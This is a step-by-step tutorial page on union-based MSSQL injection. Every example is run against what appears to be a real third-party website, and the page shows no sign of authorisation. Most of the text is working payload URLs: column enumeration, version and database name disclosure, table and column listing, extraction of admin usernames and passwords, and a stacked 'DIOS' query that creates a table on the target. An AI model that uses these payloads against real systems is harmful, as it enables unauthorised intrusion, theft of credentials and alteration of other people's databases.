💉Union Based MSSQL Injection

Some basic errors in MSSQLi

Error

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][SQL Server Native Client 10.0][SQL Server]Executing SQL directly; no cursor.

Microsoft VBScript runtime error '800a000d' Type mismatch: 'id'

Error Executing Database Query. Line 3: Incorrect syntax near ''.

The text data type cannot be selected as DISTINCT because it is not comparable.

Operand type clash: text is incompatible with int

----------------------------------------------------------------

Step : 1

Putting single quote and then putting double quote checking the Error:


http://aquaservices.co.in/Product.aspx?Id=13'
ERROR

http://aquaservices.co.in/Product.aspx?Id=13"
ERROR

When both Single quote and double Quotes gives error then there are high probablities that the injection type is integer based

----------------------------------------------------------------

Step : 2

Now we need to know the comment type for MSSQL.

Comment

Name

Comment Type 1

--+

Comment Type 2

--+-

SQL Comment

/**/

Inline Comment

;%00

Null Byte

Now lets try the basic -- comment with our target:


http://aquaservices.co.in/Product.aspx?Id=13--
working fine.

http://aquaservices.co.in/Product.aspx?Id=13 order by 1--
No Error

http://aquaservices.co.in/Product.aspx?Id=13 order by 100--
Here comes the error : The order by position number 100 is out of range of the number of items

Now we continue with order by and in the end we come to know that 8 is the last working column.

----------------------------------------------------------------

Step : 3

Now we need using the union select query:


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select 1,2,3,4,5,6,7,8--
Again we got a error : Operand Type Clash: text is incompatible with int

In case of Such Errors on Union select statement we have an option to use null in all columns, so lets try that:


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select null,null,null,null,null,null,null,null--

Again we got a error : The text data type cannot be selected as DISTINCT because it is not comparable.

Heres one more type of error you can find while MSSQL Injection and the solution for this is just use "Union All Select" in place of "Unoin Select", Lets try:


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select null,null,null,null,null,null,null,null--

Again we got a error : Conversion from type 'DBNull' to type 'String' is not valid. Also known as Datatype Mistmatch Error

The Solution for this type of Errors is as here we can see DBNULL to STRING mismatch so we have to convert each column one by one and see if we can get make it to work. To put a string we can use single quotes but i prefer using the db_name() function to avoid some error. Here we have Eight Columns changing each column one by one. So I am generate the payloads which will put db_name() in eight columns one by one:

Now you can use Burp Suite intruder to Fuzz the payload on place of columns:


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select db_name(),2,3,4,5,6,7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave this column as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,db_name(),3,4,5,6,7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave that column as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,db_name(),4,5,6,7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave that columns as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select db_name(),2,3,db_name(),5,6,7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave that column as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,db_name(),6,7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave that parameter as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,db_name(),7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave that parameter as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,db_name(),8--
Here we can see the second Column Getting printed.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,db_name(),db_name()--
Conversion failed when converting the nvarchar value 'AquaService' to data type bit. (Here we can see the Database name in Error)

----------------------------------------------------------------

Step : 4

Now we can Put @@version on place of vulnerable column to get the current version from database:


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,@@version,3,4,5,6,db_name(),8--

----------------------------------------------------------------

Step : 5

Now and we got the version, now we can get the current database name using db_name()


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,db_name(),3,4,5,6,db_name(),8--

---------------------------------------------------------------

There are some other ways also to collect some more information from MSSQL which are given here:

Query/Function

Output

@@version

Current Version

user_name()

Current User

user,system_user,current_user

Current User

db_name()

Current Database

db_name()

Current Database

@@SERVERNAME

Hostname

----------------------------------------------------------------

Step : 5

Now we will extract the table names, here the syntax is a little bit different than MySQL of lack of limit clause in MSSQL.


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 1 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the first table name : AdminLogin
--------------------
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 2 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the second table name : Certificate
--------------------
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 3 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the Forth table name : ClientList
--------------------

----------------------------------------------------------------

Step : 6

In the same manner we can get all the tables one by one. Now lets get the columns.

I will extract the colums from AdminLogin table:


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 1 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the first column from AdminLogin Table : IsActive
--------------------
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 2 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the Second column from AdminLogin Table : Password
--------------------
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 4 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the Third column from AdminLogin Table : UserName
--------------------

----------------------------------------------------------------

Step : 7

We got the table names the column names and now lets extrct the data from them.

For concatination we can use %2b which is +


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,username%2b' '%2bpassword,3,4,5,6,db_name(),8 from AdminLogin--

----------------------------------------------------------------

MSSQL DIOS :

Now in the end i will like to show you how to make the whole process alot faster by using MSSQL DIOS:


http://aquaservices.co.in/Product.aspx?Id=13;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='injected by ZEN :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b  CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into temp_dios_sample END--

It will give error but actually its making the DIOS table so now lets try checking the output under temp_dios_sample:

So Here we are finished with MSSQL Union Based Injection

PreviousUNION Based MySQL Injection NextUnion Based Oracle Injection

Last updated 1 year ago